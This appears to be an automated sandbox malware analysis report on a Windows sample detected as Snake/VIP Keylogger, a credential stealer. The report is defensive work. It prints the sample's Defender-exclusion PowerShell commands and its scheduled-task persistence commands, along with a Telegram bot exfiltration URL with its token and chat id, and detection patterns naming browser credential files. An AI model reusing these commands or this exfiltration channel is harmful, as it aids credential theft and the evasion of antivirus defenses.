Edit tour

Windows Analysis Report
SNKO05B241100201.exe

Overview

General Information

Sample name:	SNKO05B241100201.exe
Analysis ID:	1633720
MD5:	7a3fe7b37dd00e2ee171c9cd338cbe57
SHA1:	1079a9196745148a1f4928c66480706ee0f36707
SHA256:	35ec397eea9d33a1ad18da5f55087a53a47771a8c74a85894eec1c133c085923
Tags:	exeuser-cocaman
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

SNKO05B241100201.exe (PID: 7148 cmdline: "C:\Users\user\Desktop\SNKO05B241100201.exe" MD5: 7A3FE7B37DD00E2EE171C9CD338CBE57)

powershell.exe (PID: 6356 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SNKO05B241100201.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6536 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HURBBASu.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 3512 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 6608 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HURBBASu" /XML "C:\Users\user\AppData\Local\Temp\tmp23A6.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SNKO05B241100201.exe (PID: 5096 cmdline: "C:\Users\user\Desktop\SNKO05B241100201.exe" MD5: 7A3FE7B37DD00E2EE171C9CD338CBE57)

HURBBASu.exe (PID: 4156 cmdline: C:\Users\user\AppData\Roaming\HURBBASu.exe MD5: 7A3FE7B37DD00E2EE171C9CD338CBE57)

schtasks.exe (PID: 3192 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HURBBASu" /XML "C:\Users\user\AppData\Local\Temp\tmp3588.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 3824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

HURBBASu.exe (PID: 3676 cmdline: "C:\Users\user\AppData\Roaming\HURBBASu.exe" MD5: 7A3FE7B37DD00E2EE171C9CD338CBE57)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-usering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot8019869757:AAFZ9XHN-49qRW4hpU6dvLTFC3DhSZuSUNk/sendMessage"}

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "8019869757:AAFZ9XHN-49qRW4hpU6dvLTFC3DhSZuSUNk", "Chat id": "5649235024"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "8019869757:AAFZ9XHN-49qRW4hpU6dvLTFC3DhSZuSUNk", "Chat_id": "5649235024", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.3928992900.0000000002E0E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000D.00000002.3929285502.0000000002F0C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000D.00000002.3926594506.000000000043D000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.3926594506.0000000000434000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000D.00000002.3926594506.0000000000434000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000008.00000002.3928992900.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000D.00000002.3929285502.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1512935966.00000000046BC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1512935966.00000000046BC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1512935966.00000000046BC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1512935966.00000000046BC000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e3ed:$a1: get_encryptedPassword 0x7220d:$a1: get_encryptedPassword 0xb5e2d:$a1: get_encryptedPassword 0x2e716:$a2: get_encryptedUsername 0x72536:$a2: get_encryptedUsername 0xb6156:$a2: get_encryptedUsername 0x2e1fd:$a3: get_timePasswordChanged 0x7201d:$a3: get_timePasswordChanged 0xb5c3d:$a3: get_timePasswordChanged 0x2e306:$a4: get_passwordField 0x72126:$a4: get_passwordField 0xb5d46:$a4: get_passwordField 0x2e403:$a5: set_encryptedPassword 0x72223:$a5: set_encryptedPassword 0xb5e43:$a5: set_encryptedPassword 0x2faac:$a7: get_logins 0x738cc:$a7: get_logins 0xb74ec:$a7: get_logins 0x2fa0f:$a10: KeyLoggerEventArgs 0x7382f:$a10: KeyLoggerEventArgs 0xb744f:$a10: KeyLoggerEventArgs
Process Memory Space: SNKO05B241100201.exe PID: 7148	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SNKO05B241100201.exe PID: 7148	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: SNKO05B241100201.exe PID: 7148	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: SNKO05B241100201.exe PID: 7148	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: SNKO05B241100201.exe PID: 7148	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x45cd1:$a1: get_encryptedPassword 0x45ff0:$a2: get_encryptedUsername 0x45aeb:$a3: get_timePasswordChanged 0x45bf4:$a4: get_passwordField 0x45ce7:$a5: set_encryptedPassword 0x481cb:$a7: get_logins 0x4812e:$a10: KeyLoggerEventArgs 0x47d97:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: SNKO05B241100201.exe PID: 5096	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SNKO05B241100201.exe PID: 5096	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: HURBBASu.exe PID: 3676	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: HURBBASu.exe PID: 3676	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: HURBBASu.exe PID: 3676	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.SNKO05B241100201.exe.46fff80.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SNKO05B241100201.exe.46fff80.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.SNKO05B241100201.exe.46fff80.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.SNKO05B241100201.exe.46fff80.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c48d:$a1: get_encryptedPassword 0x2c7b6:$a2: get_encryptedUsername 0x2c29d:$a3: get_timePasswordChanged 0x2c3a6:$a4: get_passwordField 0x2c4a3:$a5: set_encryptedPassword 0x2db4c:$a7: get_logins 0x2daaf:$a10: KeyLoggerEventArgs 0x2d714:$a11: KeyLoggerEventArgsEventHandler
0.2.SNKO05B241100201.exe.46fff80.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a261:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39904:$a3: \Google\Chrome\User Data\Default\Login Data 0x39b61:$a4: \Orbitum\User Data\Default\Login Data 0x3a540:$a5: \Kometa\User Data\Default\Login Data
0.2.SNKO05B241100201.exe.46fff80.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d0b8:$s1: UnHook 0x2d0bf:$s2: SetHook 0x2d0c7:$s3: CallNextHook 0x2d0d4:$s4: _hook
0.2.SNKO05B241100201.exe.46bc160.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SNKO05B241100201.exe.46bc160.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.SNKO05B241100201.exe.46bc160.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.SNKO05B241100201.exe.46bc160.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c48d:$a1: get_encryptedPassword 0x2c7b6:$a2: get_encryptedUsername 0x2c29d:$a3: get_timePasswordChanged 0x2c3a6:$a4: get_passwordField 0x2c4a3:$a5: set_encryptedPassword 0x2db4c:$a7: get_logins 0x2daaf:$a10: KeyLoggerEventArgs 0x2d714:$a11: KeyLoggerEventArgsEventHandler
0.2.SNKO05B241100201.exe.46bc160.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a261:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39904:$a3: \Google\Chrome\User Data\Default\Login Data 0x39b61:$a4: \Orbitum\User Data\Default\Login Data 0x3a540:$a5: \Kometa\User Data\Default\Login Data
0.2.SNKO05B241100201.exe.46bc160.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d0b8:$s1: UnHook 0x2d0bf:$s2: SetHook 0x2d0c7:$s3: CallNextHook 0x2d0d4:$s4: _hook
0.2.SNKO05B241100201.exe.46fff80.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SNKO05B241100201.exe.46fff80.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.SNKO05B241100201.exe.46fff80.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.SNKO05B241100201.exe.46fff80.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e28d:$a1: get_encryptedPassword 0x71ead:$a1: get_encryptedPassword 0x2e5b6:$a2: get_encryptedUsername 0x721d6:$a2: get_encryptedUsername 0x2e09d:$a3: get_timePasswordChanged 0x71cbd:$a3: get_timePasswordChanged 0x2e1a6:$a4: get_passwordField 0x71dc6:$a4: get_passwordField 0x2e2a3:$a5: set_encryptedPassword 0x71ec3:$a5: set_encryptedPassword 0x2f94c:$a7: get_logins 0x7356c:$a7: get_logins 0x2f8af:$a10: KeyLoggerEventArgs 0x734cf:$a10: KeyLoggerEventArgs 0x2f514:$a11: KeyLoggerEventArgsEventHandler 0x73134:$a11: KeyLoggerEventArgsEventHandler
0.2.SNKO05B241100201.exe.46fff80.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c061:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7fc81:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b704:$a3: \Google\Chrome\User Data\Default\Login Data 0x7f324:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b961:$a4: \Orbitum\User Data\Default\Login Data 0x7f581:$a4: \Orbitum\User Data\Default\Login Data 0x3c340:$a5: \Kometa\User Data\Default\Login Data 0x7ff60:$a5: \Kometa\User Data\Default\Login Data
0.2.SNKO05B241100201.exe.46fff80.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2eeb8:$s1: UnHook 0x72ad8:$s1: UnHook 0x2eebf:$s2: SetHook 0x72adf:$s2: SetHook 0x2eec7:$s3: CallNextHook 0x72ae7:$s3: CallNextHook 0x2eed4:$s4: _hook 0x72af4:$s4: _hook
0.2.SNKO05B241100201.exe.46bc160.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SNKO05B241100201.exe.46bc160.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.SNKO05B241100201.exe.46bc160.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.SNKO05B241100201.exe.46bc160.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e28d:$a1: get_encryptedPassword 0x720ad:$a1: get_encryptedPassword 0xb5ccd:$a1: get_encryptedPassword 0x2e5b6:$a2: get_encryptedUsername 0x723d6:$a2: get_encryptedUsername 0xb5ff6:$a2: get_encryptedUsername 0x2e09d:$a3: get_timePasswordChanged 0x71ebd:$a3: get_timePasswordChanged 0xb5add:$a3: get_timePasswordChanged 0x2e1a6:$a4: get_passwordField 0x71fc6:$a4: get_passwordField 0xb5be6:$a4: get_passwordField 0x2e2a3:$a5: set_encryptedPassword 0x720c3:$a5: set_encryptedPassword 0xb5ce3:$a5: set_encryptedPassword 0x2f94c:$a7: get_logins 0x7376c:$a7: get_logins 0xb738c:$a7: get_logins 0x2f8af:$a10: KeyLoggerEventArgs 0x736cf:$a10: KeyLoggerEventArgs 0xb72ef:$a10: KeyLoggerEventArgs
0.2.SNKO05B241100201.exe.46bc160.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c061:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7fe81:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc3aa1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b704:$a3: \Google\Chrome\User Data\Default\Login Data 0x7f524:$a3: \Google\Chrome\User Data\Default\Login Data 0xc3144:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b961:$a4: \Orbitum\User Data\Default\Login Data 0x7f781:$a4: \Orbitum\User Data\Default\Login Data 0xc33a1:$a4: \Orbitum\User Data\Default\Login Data 0x3c340:$a5: \Kometa\User Data\Default\Login Data 0x80160:$a5: \Kometa\User Data\Default\Login Data 0xc3d80:$a5: \Kometa\User Data\Default\Login Data
0.2.SNKO05B241100201.exe.46bc160.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2eeb8:$s1: UnHook 0x72cd8:$s1: UnHook 0xb68f8:$s1: UnHook 0x2eebf:$s2: SetHook 0x72cdf:$s2: SetHook 0xb68ff:$s2: SetHook 0x2eec7:$s3: CallNextHook 0x72ce7:$s3: CallNextHook 0xb6907:$s3: CallNextHook 0x2eed4:$s4: _hook 0x72cf4:$s4: _hook 0xb6914:$s4: _hook
Click to see the 19 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SNKO05B241100201.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SNKO05B241100201.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SNKO05B241100201.exe", ParentImage: C:\Users\user\Desktop\SNKO05B241100201.exe, ParentProcessId: 7148, ParentProcessName: SNKO05B241100201.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SNKO05B241100201.exe", ProcessId: 6356, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HURBBASu" /XML "C:\Users\user\AppData\Local\Temp\tmp3588.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HURBBASu" /XML "C:\Users\user\AppData\Local\Temp\tmp3588.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\HURBBASu.exe, ParentImage: C:\Users\user\AppData\Roaming\HURBBASu.exe, ParentProcessId: 4156, ParentProcessName: HURBBASu.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HURBBASu" /XML "C:\Users\user\AppData\Local\Temp\tmp3588.tmp", ProcessId: 3192, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HURBBASu" /XML "C:\Users\user\AppData\Local\Temp\tmp23A6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HURBBASu" /XML "C:\Users\user\AppData\Local\Temp\tmp23A6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SNKO05B241100201.exe", ParentImage: C:\Users\user\Desktop\SNKO05B241100201.exe, ParentProcessId: 7148, ParentProcessName: SNKO05B241100201.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HURBBASu" /XML "C:\Users\user\AppData\Local\Temp\tmp23A6.tmp", ProcessId: 6608, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SNKO05B241100201.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SNKO05B241100201.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SNKO05B241100201.exe", ParentImage: C:\Users\user\Desktop\SNKO05B241100201.exe, ParentProcessId: 7148, ParentProcessName: SNKO05B241100201.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SNKO05B241100201.exe", ProcessId: 6356, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HURBBASu" /XML "C:\Users\user\AppData\Local\Temp\tmp23A6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HURBBASu" /XML "C:\Users\user\AppData\Local\Temp\tmp23A6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SNKO05B241100201.exe", ParentImage: C:\Users\user\Desktop\SNKO05B241100201.exe, ParentProcessId: 7148, ParentProcessName: SNKO05B241100201.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HURBBASu" /XML "C:\Users\user\AppData\Local\Temp\tmp23A6.tmp", ProcessId: 6608, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-10T15:37:38.947440+0100	2803305	3	Unknown Traffic	192.168.2.6	49684	104.21.112.1	443	TCP
2025-03-10T15:37:42.231416+0100	2803305	3	Unknown Traffic	192.168.2.6	49688	104.21.112.1	443	TCP
2025-03-10T15:37:43.063868+0100	2803305	3	Unknown Traffic	192.168.2.6	49689	104.21.112.1	443	TCP
2025-03-10T15:37:46.272242+0100	2803305	3	Unknown Traffic	192.168.2.6	49693	104.21.112.1	443	TCP
2025-03-10T15:37:49.422433+0100	2803305	3	Unknown Traffic	192.168.2.6	49698	104.21.112.1	443	TCP
2025-03-10T15:37:51.738834+0100	2803305	3	Unknown Traffic	192.168.2.6	49702	104.21.112.1	443	TCP
2025-03-10T15:37:52.703101+0100	2803305	3	Unknown Traffic	192.168.2.6	49706	104.21.112.1	443	TCP
2025-03-10T15:37:55.217584+0100	2803305	3	Unknown Traffic	192.168.2.6	49708	104.21.112.1	443	TCP
2025-03-10T15:37:55.689351+0100	2803305	3	Unknown Traffic	192.168.2.6	49710	104.21.112.1	443	TCP
2025-03-10T15:37:59.107120+0100	2803305	3	Unknown Traffic	192.168.2.6	49714	104.21.112.1	443	TCP
2025-03-10T15:38:01.541586+0100	2803305	3	Unknown Traffic	192.168.2.6	49716	104.21.112.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-10T15:37:33.821345+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49682	193.122.6.168	80	TCP
2025-03-10T15:37:36.649491+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49682	193.122.6.168	80	TCP
2025-03-10T15:37:37.946336+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49685	193.122.6.168	80	TCP
2025-03-10T15:37:39.961948+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49687	193.122.6.168	80	TCP
2025-03-10T15:37:40.649438+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49685	193.122.6.168	80	TCP
2025-03-10T15:37:42.946431+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49690	193.122.6.168	80	TCP
2025-03-10T15:37:43.790145+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49692	193.122.6.168	80	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-10T15:38:13.004547+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	49723	149.154.167.220	443	TCP
2025-03-10T15:38:15.252880+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	49724	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-10T15:38:04.502792+0100	1810007	1	Potentially Bad Traffic	192.168.2.6	49719	149.154.167.220	443	TCP
2025-03-10T15:38:08.023271+0100	1810007	1	Potentially Bad Traffic	192.168.2.6	49722	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000000D.00000002.3926594506.0000000000434000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "8019869757:AAFZ9XHN-49qRW4hpU6dvLTFC3DhSZuSUNk", "Chat id": "5649235024"}
Source: 0000000D.00000002.3926594506.0000000000434000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "8019869757:AAFZ9XHN-49qRW4hpU6dvLTFC3DhSZuSUNk", "Chat_id": "5649235024", "Version": "4.4"}
Source: HURBBASu.exe.3676.13.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8019869757:AAFZ9XHN-49qRW4hpU6dvLTFC3DhSZuSUNk/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Virustotal: Detection: 40%			Perma Link

Multi AV Scanner detection for submitted file

Source: SNKO05B241100201.exe	Virustotal: Detection: 40%			Perma Link
Source: SNKO05B241100201.exe	ReversingLabs: Detection: 42%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.6% probability

Sample uses string decryption to hide its real strings

Source: 0.2.SNKO05B241100201.exe.46fff80.2.unpack	String decryptor: 8019869757:AAFZ9XHN-49qRW4hpU6dvLTFC3DhSZuSUNk
Source: 0.2.SNKO05B241100201.exe.46fff80.2.unpack	String decryptor: 5649235024
Source: 0.2.SNKO05B241100201.exe.46fff80.2.unpack	String decryptor:

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: SNKO05B241100201.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49683 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49686 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.168.2.6:49686 -> 104.21.112.1:443 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49723 version: TLS 1.2

Source: SNKO05B241100201.exe

